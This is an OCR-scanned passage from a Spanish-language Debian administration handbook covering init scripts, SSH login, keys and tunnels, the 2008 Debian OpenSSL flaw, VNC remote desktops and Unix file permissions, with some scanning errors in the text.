tros  correctos.  La  pagina  de  manual  update- rc .d ( 1)  describe  la  sintaxis  en  detalle.  Sepa  que 
eliminar  todos  los  enlaces  simbolicos  (con  el  parametro  remove)  no  es  un  buen  metodo  de  desac- 
tivar  un  servicio.  En  su  lugar,  simplemente  deberia  configurar  para  que  el  mismo  no  se  ejecute 
en  el  nivel  de  ejecucion  deseado  (preservando  las  llamadas  para  detenerlo  en  caso  que  el  servicio 
este  ejecutando  en  el  nivel  de  ejecucion  anterior).  Debido  a  que  update  -  rc .  d  tiene  una  interfaz 
bastante  compleja,  puede  preferir  utilizar  rcconf  (en  el  paquete  rcconf)  que  provee  una  interfaz 
mucho  mas  amigable. 


NORMATIVA  DEBIAN  Los  scripts  de  mantenimiento  para  paquetes  Debian  a  veces  reinician  algunos  ser- 

Reinicializacion  de  vicios  para  asegurar  su  disponibilidad  o  conseguir  que  tengan  en  cuenta  algunas 

servicios  opciones.  El  script  que  controla  un  servicio  —  service  servicio  operacion  —  no 
tiene  en  cuenta  el  nivel  de  ejecucion,  asume  (incorrectamente)  que  el  servicio  esta 
siendo  utilizado  actualmente  y,  por  lo  tanto,  puede  iniciar  operaciones  incorrectas 
(iniciar  un  servicio  que  fue  detenido  deliberadamente  o  detener  un  servicio  que 
no  esta  ejecutando,  etc.).  Por  lo  tanto,  Debian  introdujo  el  programa  invoke- rc. 
d:  los  scripts  de  mantenimiento  deben  utilizar  este  programa  para  ejecutar  scripts 
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de  inicializacion  de  servicios  que  solo  ejecutaran  las  ordenes  necesarias.  Sepa  que, 
contrario  al  uso  comun,  aqui  se  utiliza  el  sufijo  .  d  en  el  nombre  de  un  programa  y 
no  en  un  directorio. 


Finalmente,  in  it  inicia  los  programas  de  control  para  varias  consolas  virtuales  (getty).  Muestra 
un  prompt  esperando  por  un  nombre  de  usuario  y  luego  ejecuta  login  usuario  para  iniciar  una 
sesion. 


VOCABULARIO  Los  primeros  equipos  generalmente  estaban  separados  en  varias  partes  muy  gran- 
Consola  y  terminal  des:  comPartimiento  de  almacenamiento  y  la  unidad  de  procesamiento  central 
estaban  separados  de  los  dispositivos  perifericos  que  los  operadores  utilizaban  para 
controlarlos.  Estos  eran  parte  de  un  mobiliario  separado:  la  «consola».  Se  mantuvo 
este  termino  pero  cambio  su  significado.  Se  convirtio,  de  cierta  forma,  en  sinonimo 
de  «terminal»  (un  teclado  y  una  pantalla). 

Con  el  desarrollo  de  la  tecnologla,  los  sistemas  operativos  han  ofrecido  varias  con- 
solas  virtuales  que  permiten  varias  sesiones  independientes  al  mismo  tiempo,  aun 
si  solo  hay  un  teclado  y  pantalla.  La  mayoria  de  los  sistemas  GNU/Linux  ofrecen 
seis  consolas  virtuales  (en  modo  texto)  a  las  que  puede  acceder  presionando  las 
combinaciones  de  teclas  Control+Alt+Fl  a  Control+Alt+F6. 

Por  extension,  los  terminos  «consola»  y  «terminal»  tambien  pueden  hacer  refe¬ 
renda  a  emuladores  de  terminales  en  una  sesion  grafica  X1 1  (como  xterm,  gnome- 
terminal  o  konsole). 


9.2.  Inicio  de  sesion  remoto 

Es  esencial  para  el  administrador  poder  conectarse  a  un  equipo  de  forma  remota.  Los  servidores, 
aislados  en  su  propia  habitacion,  rara  vez  estan  equipados  con  monitores  y  teclados  permanen- 
tes  —  pero  estan  conectados  a  la  red. 


VOLVER  A  LOS  CIMIENTOS  Generalmente  se  describe  a  un  sistema  en  el  que  varios  procesos  se  comunican 
Cliente  servidor  entre  ellos  con  la  metafora  «cliente/servidor».  El  servidor  es  el  programa  que  toma 
y  ejecuta  los  pedidos  que  provienen  de  un  cliente.  Es  el  cliente  el  que  controla  la 
operacion,  el  servidor  no  tiene  iniciativa  propia. 


9.2.1  Inicio  seguro  de  sesion  remota:  SSH 

El  protocolo  SSH  (interprete  de  ordenes  seguro:  «Secure  SHell»)  fue  disenado  pensando  en  la 
seguridad  y  la  confiabilidad.  Las  conexiones  que  utilizan  SSH  son  seguras:  la  otra  parte  es  auten- 
ticada  y  se  cifran  todos  los  datos  intercambiados. 


CULTURA  Antes  de  SSH,  Telnet  y  RSH  eran  las  principals  herramientas  para  sesiones  remo- 

Telnet  y  RSH  son  tas.  Actualmente  son  generalmente  obsoletas  y  no  deberfa  utilizarlas  aun  cuando 

obsoletos  Debian  todavia  las  provee. 
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VOCABULARIO  Cuando  necesita  proveerle  a  un  cliente  la  capacidad  de  realizar  o  desencadenar 

Autenticacion  cifrado  acciones  en  un  servidor,  la  seguridad  es  importante.  Debe  asegurar  la  identidad 

del  cliente;  esto  es  autenticacion.  Esta  identidad  generalmente  consisten  en  una 
constrasena  que  debe  mantenerse  en  secreto  o  cualquier  otro  cliente  podria  obtener 
la  contrasena.  Este  es  el  proposito  del  cifrado,  que  es  una  forma  de  codificacion  que 
permite  a  dos  sistemas  intercambiar  informacion  confidencial  en  un  canal  publico 
al  mismo  tiempo  que  la  protege  de  que  otros  la  puedan  leer. 

Frecuentemente  se  nombran  a  la  autenticacion  y  al  cifrado  en  conjunto,  tanto  por- 
que  se  los  utiliza  a  ambos  como  porque  generalmente  son  implementados  con  con- 
ceptos  matematicos  similares. 


SSH  tambien  ofrece  dos  servicios  de  transferencia  de  archivos.  scp  es  una  herramienta  para 
la  terminal  que  puede  utilizar  como  cp  excepto  que  cualquier  ruta  a  otro  equipo  utilizara  un 
prefijo  con  el  nombre  de  la  maquina  seguido  de  dos  puntos  («:»). 

$  scp  archivo  equipo: /tmp/ 


sf tp  es  un  programa  interactive  similar  a  ftp.  En  una  sola  sesion  sf tp  puede  transferir  varios 
archivos  y  es  posible  manipular  archivos  remotos  con  el  (eliminar,  renombrar,  cambiar  permi- 
sos,  etc.). 

Debian  utiliza  OpenSSH,  una  version  libre  de  SSH  mantenida  por  el  proyecto  OpenBSD  (un  sis- 
tema  operativo  libre  basado  en  el  nucleo  BSD  enfocado  en  seguridad)  que  es  una  bifurcacion 
(«fork»)  del  software  SSH  original  desarrollado  por  la  empresa  SSH  Communications  Security 
Corp  de  Finlandia.  Esta  empresa  inicialmente  desarrollo  SSH  como  software  libre  pero  eventual- 
mente  decidio  continuar  su  desarrollo  bajo  una  licencia  privativa.  El  proyecto  OpenBSD  luego 
creo  OpenSSH  para  mentener  una  version  libre  de  SSH. 


VOLVER  A  LOS  CIMIENTOS  Una  bifurcacion  («fork»),  en  el  campo  de  software,  significa  que  comienza  un  nue- 
Bifurcaciorr  «fork»  vo  Proyect°  como  cion  de  un  proyecto  existente  y  que  competira  con  el.  Desde 
alii,  ambos  programas  generalmente  divergiran  rapidamente  en  terminos  de  nue- 
vos  desarrollos.  Por  lo  general  son  un  resultado  de  desacuerdos  dentro  del  equipo 
de  desarrollo. 

La  opcion  de  bifurcar  un  proyecto  es  un  resultado  directo  de  la  naturaleza  misma 
del  software  libre;  es  un  evento  saludable  cuando  permite  la  continuacion  de  un 
proyecto  como  software  libre  (por  ejemplo,  en  el  caso  de  cambios  de  licencia).  Una 
bifurcacion  generada  por  desacuerdos  tecnicos  o  personales  usualmente  es  un  des- 
perdicio  de  recursos;  se  prefiere  otra  solucion.  Tambien  ocurren  fusiones  de  dos 
proyectos  que  anteriormente  habian  bifurcado. 


OpenSSH  esta  dividido  en  dos  paquetes:  la  parte  del  cliente  se  encuentra  en  el  paquete  openssh- 
client  y  el  servidor  en  el  paquete  openssh-server.  El  metapaquete  ssh  depende  de  ambas  partes  y 
facilita  la  instalacion  conjunta  (apt  install  ssh). 
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Autenticacion  basada  en  Haves 


Cada  vez  que  alguien  inicia  sesion  a  traves  de  SSH,  el  servidor  remoto  pide  una  contrasena  para 
autenticar  al  usuario.  Esto  puede  ser  problematico  si  desea  automatizar  la  conexion  o  si  utiliza 
una  herramienta  que  necesita  conexiones  frecuentes  sobre  SSH.  Es  por  esto  que  SSH  ofrece  un 
sistema  de  autenticacion  basada  en  Haves. 

El  usuario  genera  un  par  de  Haves  en  la  maquina  cliente  con  ssh-keygen  -t  rsa;  la  Have  pu- 
blica  se  almacena  en  -/ .  ssh/id_rsa .  pub  mientras  que  la  Have  privada  correspondiente  estara 
almacenada  en  ~/ .  ssh/id_rsa.  Luego,  el  usuario  utiliza  ssh-copy-id  servidor  para  agregar 
su  Have  publica  al  archivo  -/ .  ssh/authorized  keys  en  el  servidor.  Si  no  se  protegio  la  Have 
privada  con  una  «frase  de  contrasena»  al  momento  de  crearla,  todos  los  inicios  de  sesion  si- 
guientes  al  servidor  funcionaran  sin  contrasena.  De  lo  contrario,  debe  descifrar  la  Have  privada 
cada  vez  ingresando  la  frase  de  contrasena.  Afortunadamente,  ssh- agent  permite  mantener 
Haves  privadas  en  memoria  para  no  tener  que  ingresar  la  frase  de  contrasena  regularmente.  Pa¬ 
ra  ello,  simplemente  utilizaria  ssh -add  (una  vez  por  sesion  de  trabajo)  siempre  que  la  sesion 
ya  este  asociada  con  una  instancia  funcional  de  ssh-agent.  De  forma  predeterminada,  Debian 
activa  este  comportamiento  en  sesiones  graficas  pero  lo  puede  desactivar  cambiando  el  archivo 
/etc/Xll/Xsession  .  options.  Para  una  sesion  en  consola,  puede  iniciarlo  manualmente  con 
eval  $(ssh-agent). 


SEGURIDAD  Quien  posea  la  Have  privada  puede  iniciar  sesion  con  la  cuenta  configurada.  Es  por 

Proteccion  de  la  Have  esto  tlue  se  Pr°tege  la  Have  privada  con  una  «frase  de  contrasena*.  Quien  obten- 

privada  ga  una  coP'a  del  archivo  de  la  Have  privada  (por  ejemplo,  -/ .  ssh/id_rsa)  todavia 
tendra  que  saber  dicha  frase  para  poder  intentar  utilizaria.  Sin  embargo,  esta  pro¬ 
teccion  adicional  no  es  infalible  y  es  mejor  deshabilitar  la  Have  en  aquellos  equipos 
en  las  que  la  instalo  (eliminandola  de  los  archivos  authorizedkeys)  y  reempla- 
zandola  con  una  nueva  Have  que  haya  generado. 


CULTURA  La  biblioteca  OpenSSL,  como  fue  provista  inicialmente  en  Debian  Etch ,  tenia  un 
Falla  OpenSSL  en  Debian  seri°  problema  en  su  generador  de  numeros  aleatorios  (RNG:  «Random  Number 

Generator*).  El  desarrollador  Debian  habia  realizado  una  modificacion  para  que 
los  programas  que  la  utilizan  no  generaran  advertencias  mientras  eran  objetivo  de 
analisis  por  herramientas  de  pruebas  de  memoria  como  valgrind.  Desafortuna- 
damente,  este  cambio  tambien  significaba  que  el  RNG  solo  utilizaba  una  fuente 
de  entropia  que  correspondia  al  numero  de  proceso  (PID);  pero  los  32000  valores 
posibles  del  mismo  no  ofrecen  suficiente  aleatoriedad. 

»-  http : //www. debian . org/security/2008/dsa- 1571 

Especificamente,  cuando  utilizaba  OpenSSL  para  generar  una  Have,  siempre  produ- 
cia  una  Have  dentro  de  un  conjunto  conocido  de  cientos  de  miles  de  Haves  (32000 
multiplicado  por  una  pequena  cantidad  de  longitudes  de  Haves).  Esto  afectaba  Ha¬ 
ves  SSH,  Haves  SSL  y  certificados  X.509  utilizados  por  numerosas  aplicaciones,  como 
OpenVPN.  Un  «cracker»  solo  debia  intentar  todas  estas  Haves  paraobtener  un  acce- 
so  no  autorizado.  Para  reducir  el  impacto  del  problema,  se  modified  el  demonio  SSH 
para  rechazar  las  Haves  problematicas  incluidas  en  los  paquetes  openssh-biacklist 
y  openssh-blacklist-extra.  Ademas,  el  programa  ssh-vulnkey  permite  identificar 
posibles  Haves  comprometidas  en  el  sistema. 
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Un  analisis  mas  detallado  de  este  problema  resalto  que  era  el  resultado  de  mul¬ 
tiples  problemas  (pequenos)  del  proyecto  OpenSSL  y  del  encargado  del  paquete 
Debian.  Una  biblioteca  tan  utilizada  como  OpenSSL  no  deberia  —  sin  modificacio- 
nes  —  generar  advertencias  cuando  es  probada  con  valgrind.  Lo  que  es  mas,  el 
codigo  (especialmente  las  partes  tan  sensibles  como  el  RNG)  deberian  tener  mejo- 
res  comentarios  para  evitar  estos  errores.  Por  parte  de  Debian,  el  encargado  queria 
validar  las  modificaciones  con  los  desarrolladores  de  OpenSSL,  pero  simplemente 
explico  las  modificaciones  sin  proporcionar  el  parche  correspondiente  para  su  re¬ 
vision  y  se  olvido  de  mencionar  su  papel  en  Debian.  Por  ultimo,  las  decisiones  de 
mantenimiento  no  fueron  las  optimas:  los  cambios  en  el  codigo  original  no  estaban 
comentados  de  forma  clara;  todas  las  modificaciones  fueron  almacenadas  en  un 
repositorio  Subversion,  pero  terminaron  agrupadas  en  un  solo  parche  durante  la 
creacion  del  paquete  fuente. 

Bajo  tales  condiciones  es  dificil  encontrar  las  medidas  correctivas  para  evitar  que 
ocurran  incidentes  similar.  La  leccion  a  aprender  aquf  es  que  cada  divergencia  que 
Debian  introduce  al  software  de  origen  debe  estar  justificada,  documentad,  debe 
ser  enviada  al  proyecto  de  origen  cuando  sea  posible  y  publicitada  ampliamente. 
Es  desde  esta  perspectiva  que  se  desarrollaron  el  nuevo  formato  de  paquete  fuente 
(«3.0  (quilt)»)  y  el  servicio  web  de  codigo  fuente  de  Debian. 

■*-  http://sources.debian.net 


Utilizacion  aplicaciones  XU  remotas 

El  protocolo  SSH  permite  redirigir  datos  graficos  (sesion  «X11»  por  el  nombre  del  sistema  grafico 
mas  utilizado  en  Unix);  el  servidor  luego  mantiene  un  canal  dedicado  para  estos  datos.  Especffi- 
camente,  el  programa  grafico  ejecutado  remotamente  puede  mostrarse  en  el  servidor  X.org  de 
la  pantalla  local  y  toda  la  sesion  (datos  ingresados  y  lo  que  sea  mostrado)  sera  segura.  De  forma 
predeterminada,  esta  funcionalidad  esta  desactivada  porque  permite  que  aplicaciones  remotas 
interfieran  con  el  sistema  local.  Puede  activarla  especificando  X1 1  Forwarding  yes  en  el  archivo 
de  configuracion  del  servidor  (/etc/ssh/sshd_config).  Finalmente,  el  usuario  tambien  debe 
solicitarlo  agregando  la  opcion  -X  al  ejecutar  ssh. 


Creacion  de  tuneles  cifrados  con  redireccion  de  puertos 

Las  opciones  -R  y  -L  le  permiten  a  ssh  crear  «tuneles  cifrados»  entre  dos  equipos,  redirigiendo 
de  forma  segura  un  puerto  TCP  local  (revise  el  recuadro  «TCP/UDP»  pagina  236)  a  un  equipo 
remoto  o  viceversa. 


VOCABULARIO  Internet,  y  la  mayorfa  de  las  redes  de  area  local  conectadas  a  el  la,  funcionan  bajo 
Tunel  conmutacion  de  paquetes  y  no  bajo  conmutacion  de  circuitos,  lo  que  significa  que 
un  paquete  enviado  de  un  equipo  a  otro  sera  detenido  en  varios  routers  intermedios 
para  encontrar  su  ruta  al  destino.  Todavia  puede  simular  el  modo  de  conexion  en 
el  que  el  flujo  este  encapsulado  en  paquetes  IP  normales.  Estos  paquetes  siguen  su 
ruta  usual  pero  se  reconstruye  el  flujo  sin  cambios  en  el  destino.  A  esto  le  llamamos 
un  «tunel»,  el  analogo  a  un  tunel  vial  en  el  que  los  vehfculos  conducen  directamente 
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desde  la  entrada  a  la  salida  sin  encontrase  con  interseccion  alguna  a  diferencia  de 
una  ruta  en  la  superficie  que  involucrarfa  intersecciones  y  cambios  de  direccion. 

Puede  utilizar  esta  oportunidad  para  agregar  cifrado  al  tunel:  asi  el  flujo  del  mis- 
mo  no  puede  ser  reconocido  desde  el  exterior,  pero  al  salir  del  tunel  se  encuentra 
descifrado. 


ssh  -L  8000:servidor:25  intermedia  rio  establece  una  sesion  SSH  con  el  equipo  intermedia¬ 
rio  y  escucha  en  el  puerto  local  8000  (revise  la  Figura  9.3,  “Redireccion  de  un  puerto  local  con 
SSH”  pagina  207).  Para  cualquier  conexion  en  este  puerto,  ssh  iniciara  una  conexion  desde  el 
equipo  intennediario  al  puerto  25  de  servidor  y  unira  ambas  conexiones. 

ssh  -R  8000:servidor:25  inte rmedia rio  tambien  establece  una  sesion  SSH  al  equipo  inter- 
mediario,  pero  es  en  este  equipo  que  ssh  escuchara  en  el  puerto  8000  (revise  la  Figura  9.4,  “Re¬ 
direccion  de  un  puerto  remoto  con  SSH”  pagina  208).  Cualquier  conexion  establecida  en  este 
puerto  causara  que  ssh  abra  una  conexion  desde  el  equipo  local  al  puerto  25  de  servidor  y  unira 
ambas  conexiones. 

En  ambos  casos,  se  realizan  las  conexiones  en  el  puerto  25  del  equipo  servidor,  que  pasaran  a 
traves  del  tunel  SSH  establecido  entre  la  maquina  local  y  la  maquina  intermediario.  En  el  primer 
caso,  la  entrada  al  tunel  es  el  puerto  local  8000  y  los  datos  se  mueven  hacia  la  maquina  interme¬ 
diario  antes  de  dirigirse  a  servidor  en  la  red  «publica».  En  el  segundo  caso,  la  entrada  y  la  salida 
del  tunel  son  invertidos;  la  entrada  es  en  el  puerto  8000  de  la  maquina  intermediario,  la  salida  es 
en  el  equipo  local  y  los  datos  son  dirigidos  a  servidor.  En  la  practica,  el  servidor  generalmente 
esta  en  la  maquina  local  o  el  intermediario.  De  esa  forma  SSH  asegura  la  conexion  un  extremo  a 
otro. 


Figura  9.3  Redireccion  de  un  puerto  local  con  SSH 
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Figura  9.4  Redirection  de  un  puerto  remoto  con  SSH 


9.2.2.  Utilizacion  de  escritorios  graficos  remotos 

VNC  (computacion  en  redes  virtuales:  «Virtual  Network  Computing)))  permite  el  acceso  remoto 
a  escritorios  graficos. 

Esta  herramienta  se  utiliza  mas  que  nada  para  asistencia  tecnica;  el  administrador  puede  ver  los 
errores  con  los  que  se  enfrenta  el  usuario  y  mostrarle  el  curso  de  accion  correcto  sin  tener  que 
estar  a  su  lado. 

Primero,  el  usuario  debe  autorizar  compartir  su  sesion.El  entornos  graficos  de  escritorio  GNOME 
en  Jessie  incluye  esa  opcion  en  su  panel  de  configuracion  (al  contrario  que  en  versiones  anterio- 
res  de  Debian,  donde  el  usuario  tenia  que  instalar  y  ejecutar  la  orden  vino).  KDE  aun  requiere 
utilizar  krf  b  para  permitir  compartir  una  sesion  existente  sobre  VNC.  Para  otros  entornos  gra¬ 
ficos  de  escritorio,  el  programa  xllvnc  (en  el  paquete  Debian  del  mismo  nombre)  cumple  el 
mismo  proposito;  puede  ponerlo  a  disposicion  del  usuario  con  un  icono  explicito. 

Cuando  la  sesion  grafica  esta  disponible  a  traves  de  VNC,  el  administrador  debe  conectarse  a 
ella  con  un  cliente  VNC.  Para  ello  GNOME  posee  vinag  re  y  remmina,  mientras  que  KDE  incluye 
krdc  (en  el  menu  K— f  Internet— »  Cliente  de  Escritorio  Remoto).  Existen  otros  clientes  VNC 
para  utilizar  en  una  terminal  como  xvnc4viewe  r  en  el  paquete  Debian  del  mismo  nombre.  Una 
vez  conectado,  el  administrador  puede  ver  lo  que  sucede,  trabajar  en  el  equipo  remotamente  y 
mostrarle  al  usuario  como  proceder. 


VOLVER  A  LOS  CIMIENTOS  gdm3,  kdm,  lightdm  y  xdm  son  gestores  de  pantalla.  Toman  el  control  de  la  interfaz 

Gestor  de  pantallas  grafica  poco  despues  del  inicio  para  proveer  al  usuario  una  pantalla  de  inicio  de 
sesion.  Una  vez  que  el  usuario  inicio  sesion,  ejecutan  los  programas  necesarios  para 
iniciar  una  sesion  grafica  de  trabajo. 
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SEGURIDAD  Si  desea  conectarse  con  VNC  y  no  desea  que  se  envien  sus  datos  en  texto  piano 
VNC  sobre  SSH  a  traves  de  la  red,  es  posible  encapsular  los  datos  en  un  tunel  SSH  (revise  la  Sec- 
cion  9. 2.1. 3,  «Creacion  de  tuneles  cifrados  con  redireccion  de  puertos»  pagina  206). 
Simplemente  tiene  que  saber  que,  de  forma  predeterminada,  VNC  utiliza  el  puerto 
5900  para  la  primera  pantalla  (llamada  «localhost:0»),  5901  para  la  segunda  (llama- 
da  « local  host:  1»),  etc. 

La  orden  ssh  -L  localhost : 5901 : localhost : 5900  -N  -T  equipo  crea  un tu¬ 
nel  entre  el  puerto  local  5901  en  la  interfaz  de  «localhost»  y  el  puerto  5900  de  equi¬ 
po.  La  primera  ocurrencia  de  «localhost»  restringe  a  SSH  para  que  solo  escuche  en 
dicha  interfaz  en  la  maquina  local.  El  segundo  «localhost»  indica  que  la  interfaz  en 
la  maquina  remota  que  recibira  el  trafico  de  red  que  ingrese  en  «localhost:5901». 
Por  lo  tanto,  vncviewer  localhost  :1  conectara  el  cliente  VNC  a  la  pantalla  re¬ 
mota  aun  cuando  indique  el  nombre  de  la  maquina  local. 

Cuando  cierre  la  sesion  VNC,  recuerde  tambien  cerrar  el  tunel  saliendo  de  la  sesion 
SSH  correspondiente. 


VNC  tambien  funciona  para  usuarios  moviles  o  ejecutivos  de  empresas  que  ocasionalmente 
necesitan  iniciar  sesion  desde  sus  casas  para  acceder  a  un  escritorio  remoto  similar  al  que 
utilizan  en  la  oficina.  La  configuracion  de  tal  servicio  es  mas  complicada:  primero  instale  el 
paquete  vnc4server,  modifique  la  configuracion  del  gestor  de  pantalla  para  aceptar  pedidos 
XDMCP  Query  (en  gdm3  puede  hacerlo  agregando  Enable=true  en  la  seccion  «xdmcp»  del  archi- 
vo  /etc/gdm3/daemon .  conf).  Finalmente,  inicie  el  servidor  VNC  con  inetd  para  que  se  inicie 
una  sesion  automaticamente  cuando  el  usuario  intente  hacerlo.  Por  ejemplo,  puede  agregar  la 
siguiente  linea al  archivo  /etc/inetd.conf: 

5950  stream  tcp  nowait  nobody. tty  /us r/bin/Xvnc  Xvnc  -inetd  -query  localhost  - 
once  -geometry  1024x768  -depth  16  securitytypes=none 

Redireccionar  las  conexiones  entrantes  al  gestor  de  pantallas  soluciona  el  problema  de  la  auten- 
ticacion  ya  que  solo  los  usuarios  con  cuentas  locales  pasaran  la  pantalla  de  inicio  de  sesion  de 
gdm3  (o  su  equivalente  kdm,  xdm,  etc.).  Como  esta  operacion  permite  multiples  sesiones  simulta- 
neamente  sin  problemas  (siempre  que  el  servidor  sea  suficientemente  poderoso),  incluso  puede 
ser  utilizada  para  proveer  escritorios  completos  para  usuarios  moviles  (o  sistemas  de  escritorios 
menos  potentes  configurados  como  clientes  ligeros).  Los  usuarios  simplemente  iniciaran  sesion 
en  la  pantalla  del  servidor  con  vncviewer  servidor :  50  ya  que  utiliza  el  puerto  5950. 


9.3.  Administracion  de  permisos 

Linux  es  definitivamente  un  sistema  multiusuario  por  lo  que  necesita  proveer  un  sistema  de 
permisos  para  controlar  el  conjunto  de  operaciones  autorizadas  sobre  archivos  y  directories, 
lo  que  incluye  todos  los  recursos  del  sistema  y  los  dispositivos  (en  un  sistema  Unix  cualquier 
dispositivo  es  representado  por  un  archivo  o  un  directorio).  Este  principio  es  comun  a  todos 
los  sistemas  Unix  pero  siempre  es  util  recordarlo,  especialmente  porque  existen  algunos  usos 
avanzados  interesantes  y  relativamente  desconocidos. 
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Cada  archivo  o  directorio  tiene  permisos  especfficos  para  tres  categories  de  usuarios: 

■  su  dueno  (representado  con  u  por  «usuario»); 

■  su  grupo  dueno  (representado  con  g  por  «grupo»),  que  incluye  a  todos  los  miembros  del 
grupo; 

■  y  los  demas  (representado  con  o  por  «otros»). 

Puede  combinar  tres  tipos  de  permisos: 

■  lectura  (representado  por  r  por  «read»:  leer); 

■  escritura  (o  modificacion,  representado  con  w  por  «write»:  escribir); 

■  ejecucion  (representado  con  x  por  «eXecute»:  ejecutar). 

En  el  caso  de  un  archivo,  estos  permisos  se  entienden  facilmente:  la  lectura  permite  acceder  al 
contenido  (inclusive  copiarlo),  la  escritura  permite  cambiarlo  y  la  ejecucion  permite  ejecutarlo 
(lo  cual  solo  funcionara  si  es  un  programa). 


SEGURIDAD  Dos  permisos  particulares  son  relevantes  para  archivos  ejecutables:  setuid  y  set 
Ejecutables  setuid  y  Qid  (rePreser|tados  con  la  letra  «s»).  Sepa  que  frecuentemente  haremos  referencias 
se  tg  id  a  <(b'ts>>  Ya  que  cada  uno  de  estos  valores  booleanos  pueden  representarse  con  un  0 
o  un  1.  Estos  dos  permisos  le  permiten  a  cualquier  usuario  ejecutar  el  programa  con 
los  permisos  del  dueno  o  del  grupo  respectivamente.  Este  mecanismo  provee  acceso 
a  funcionalidades  que  necesitan  mas  permisos  de  los  que  tendria  normalmente. 

Dado  que  un  programa  cuyo  dueno  es  root  con  setuid  activado  ejecutara  sistema- 
ticamente  con  la  identidad  del  superusuario,  es  muy  importante  asegurar  que  es 
seguro  y  confiable.  De  hecho,  un  usuario  que  pueda  comprometerlo  para  ejecutar 
otro  programa  de  su  eleccion  podrfa  hacerse  pasar  por  el  usuario  root  y  obtener 
todos  los  permisos  sobre  el  sistema. 


Los  directorios  se  manejan  diferente.  El  permiso  de  lectura  provee  acceso  para  consultar  su  lista 
de  elementos  (archivos  y  directorios),  el  permiso  de  escritura  permite  crear  o  borrar  archivos 
y  el  permiso  de  ejecucion  permite  atravesarlo  (especialmente  para  llegar  a  el  con  cd).  Poder 
atravesar  un  directorio  sin  leerlo  permite  acceder  a  los  elementos  que  contenga  siempre  que 
se  conozca  su  nombre,  pero  no  le  permitira  encontrarlos  si  no  sabe  que  existen  o  conoce  sus 
nombres  exactos. 


SEGURIDAD  El  bit  setgid  tambien  funciona  en  directorios.  Cualquier  elemento  creado  en  tales 
Directorios  setgid  y  el  bit  directorios  seran  asignados  automaticamente  al  grupo  dueno  del  directorio  padre 
«sticky»  (pegajoso)  en  ^u8ar  de  heredar  el  grupo  principal  de  su  creador  como  es  usual.  Esta  configu- 
racion  evita  que  el  usuario  tenga  que  cambiar  su  grupo  principal  (con  el  programa 
newgrp)  cuando  trabaje  en  un  arbol  de  archivos  compartidos  entre  varios  usuarios 
del  mismo  grupo  dedicado. 

El  bit  «sticky»  (representado  por  la  letra  «t»)  es  un  permiso  que  solo  es  util  en 
directorios.  Es  utilizado  especialmente  en  directorios  temporales  a  los  que  todos 
tienen  permisos  de  escritura  (como  /tmp/):  restringe  la  eliminacion  de  archivos 
para  que  solo  pueda  hacerlo  el  dueno  del  mismo  (o  el  dueno  del  directorio  padre). 
Sin  esto,  cualquier  podrfa  eliminar  los  archivos  de  otros  usuarios  en  /tmp/. 
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Tres  programas  controlan  los  permisos  asociados  a  un  archivo: 

■  chown  usuario  a rchi  vo  cambia  el  dueno  de  un  archivo; 

■  chgrp  group  a  rchi  vo  modifica  el  grupo  dueno; 

■  chmod  permisos  a  rchi  vo  cambia  los  permisos  del  archivo. 

Hay  dos  formas  de  representar  permisos.  Entre  ellas,  la  representacion  simbolica  es  probable- 
mente  la  mas  sencilla  de  entender  y  recordar.  Involucra  las  letras  mencionadas  anteriormente. 
Puede  definir  permisos  para  cada  categoria  de  usuarios  (u/g/o)  definiendolos  exph'citamente 
(con  =,  agregar  permisos  (+)  o  eliminar  (-)  permisos.  Por  lo  tanto,  la  formula  u=rwx,g+rw,o-r  pro- 
vee  al  dueno  permisos  de  lectura,  escritura  y  ejecucion,  agrega  permisos  de  lectura  y  escritura 
al  grupo  dueno  y  elimina  el  permiso  de  lectura  para  los  otros  usuarios.  Los  permisos  que  no  son 
modificados  cuando  se  agreguen  o  eliminen  permisos  en  estas  formulas  se  mantienen  intactos. 
La  letra  a  (por  «all»,  todos)  incluye  las  tres  categories  de  usuarios,  por  lo  que  a=rx  otorga  los 
mismos  permisos  (lecutray  ejecucion,  pero  no  escritura)  a  las  tres  categories  de  usuario. 

La  representacion  numerica  (octal)  asocia  cada  permiso  con  un  valor:  4  para  lectura,  2  para 
escritura  y  1  para  ejecucion.  Asociamos  cada  combinacion  de  permisos  con  la  suma  de  dichos 
valores.  Se  asigna  cada  valor  a  las  diferentes  categories  de  usuarios  uniendolos  en  el  orden  usual 
(dueno,  grupo,  otros). 

Por  ejemplo,  chmod  754  archivo  configurara  los  siguientes  permisos:  lectura,  escritura  y  eje¬ 
cucion  para  el  dueno  (ya  que  7  =  4  +  2  +  l);  lectura  y  ejecucion  para  el  grupo  (ya  que  5  =  4  +l);  solo 
lectura  para  los  otros  usuarios.  0  significa  ningun  permiso;  por  lo  tanto  chmod  600  archivo 
provee  permisos  de  lectura  y  escritura  al  dueno  y  ningun  permiso  para  todos  los  demas.  La  com¬ 
binacion  de  permisos  mas  frecuente  es  755  para  archivos  ejecutables  y  directorios  y  644  para 
archivos  de  datos. 

Para  representar  permisos  especiales,  puede  agregar  un  cuarto  dfgito  antes  que  los  demas  segun 
el  mismo  principio,  donde  los  bits  setuid,  setgid  y  «sticky»  son,  respectivamente,  4,  2  y  1.  chmod 
4754  asociara  el  bit  setuid  con  los  permisos  descriptos  anteriormente. 

El  uso  de  notacion  octal  solo  permite  definir  todos  los  permisos  en  un  archivo  de  forma  simul- 
tanea;  no  puede  utilizarse  para  agregar  un  nuevo  permiso  a  un  conjunto  anterior,  como  p.ej. 
agregar  el  permiso  de  lectura  al  grupo  dueno,  ya  que  deben  tenerse  en  cuenta  los  permisos  exis- 
tentes  y  hay  que  calcular  el  nuevo  valor  numerico  correspondiente. 


SUCERENCIA  A  veces  debemos  cambiar  los  permisos  a  un  arbol  de  archivos  completo.  Todos  los 
Operacion  recursiva  programas  mencionados  aceptan  la  opcion  -R  para  trabajar  recursivamente  en  sub¬ 
directories. 

La  distincion  entre  archivos  y  directorios  a  veces  causa  problemas  con  operacio- 
nes  recursivas.  Por  eso  se  introdujo  la  letra  «X»  en  la  representacion  simbolica  de 
permisos.  Representa  el  permiso  de  ejecucion  solo  para  directorios  (y  no  para  ar¬ 
chivos  que  no  tengan  este  permiso).  Por  lo  tanto,  chmod  -R  a+X  directorio  solo 
agregara  permisos  de  ejecucion  para  todas  las  categorias  de  usuarios  (a)  en  todos 
los  subdirectories  y  aquellos  archivos  en  los  que  al  menos  una  de  las  categorias  de 
usuario  (aun  si  solo  es  el  usuario  dueno)  ya  posea  permisos  de  ejecucion. 
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SUCERENCIA 

Modification  de  usuario 
y grupo 


Frecuentemente  deseara  cambiar  el  grupo  de  un  archivo  al  mismo  tiempo  que 
cambia  su  dueno.  El  programa  chown  tiene  una  sintaxis  especial  para  esto:  chown 
usuario-.grupo  archivo 


